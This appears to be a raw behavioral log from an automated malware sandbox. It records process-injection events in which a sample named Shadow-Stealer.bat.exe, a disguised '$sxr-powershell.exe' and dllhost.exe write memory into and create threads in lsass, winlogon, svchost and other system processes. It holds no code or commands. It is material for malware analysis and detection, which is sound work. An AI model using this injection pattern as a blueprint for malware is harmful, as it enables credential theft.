            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD629A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 166729A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F15A29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 429329A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CAD29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F33129A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FDC29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA7129A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 166D29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F16029A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 429929A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CB329A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F33729A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A04929A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA7729A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EDE629A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A19829A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 95FB29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 670C29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4A4B29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 19A429A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1FC29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDC929A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D8FC29A0
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 9D2102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: D52102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe EIP: D62102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: A32102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: D72102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe EIP: D82102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 1072102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 1402102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2D52102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2D62102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 9E2102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2952102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 2902102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: BA2102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: A02102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 27D2102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: F52102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 932102
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: unknown EIP: 13A2102
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 167329A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F16629A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 429F29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CB929A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F33D29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A04F29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA7D29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EDEC29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A24029A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 966B29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 671229A0
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 1816F6E010
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2FCA008
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 8AFD72E010
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2A6A008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140002000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 21855B6010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 402000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2A89008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F797457010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 28A9008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 93E5D96010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F34EE1A010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: A2AB2C010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2B1A008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 29CA008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2AEB008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: CD0E768010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: D5C464010
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 26FD008
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 401000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 403000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 404000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 405000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 41F000
            Source: C:\Windows\$sxr-powershell.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2903008
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B4C0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 2DC0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D30000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6830000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6820000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\$sxr-powershell.exe base: 1FAD6810000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 10BF6770000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\WerFault.exe base: 3240000
            Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 30A0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016610000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F1540000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E428D0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B460000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016670000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F15A0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E42930000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15CAD0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF3310000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FDC0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA710000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D0166D0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F1600000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E42990000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15CB30000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF3370000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23CA0490000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA770000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
            Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 9D0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D50000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D60000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1050000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: A30000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D70000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D80000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1070000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1400000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D50000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D60000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 9E0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2950000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2900000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: BA0000
            Source: C:\Windows\SysWOW64\dllhost.exe Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: A00000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 27D0000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: F50000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 930000
            Source: C:\Windows\SysWOW64\dllhost.exeMemory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 13A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016730000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1660000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E429F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15CB90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF33D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA04F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA7D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDEC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2400000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 225966B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E67120000
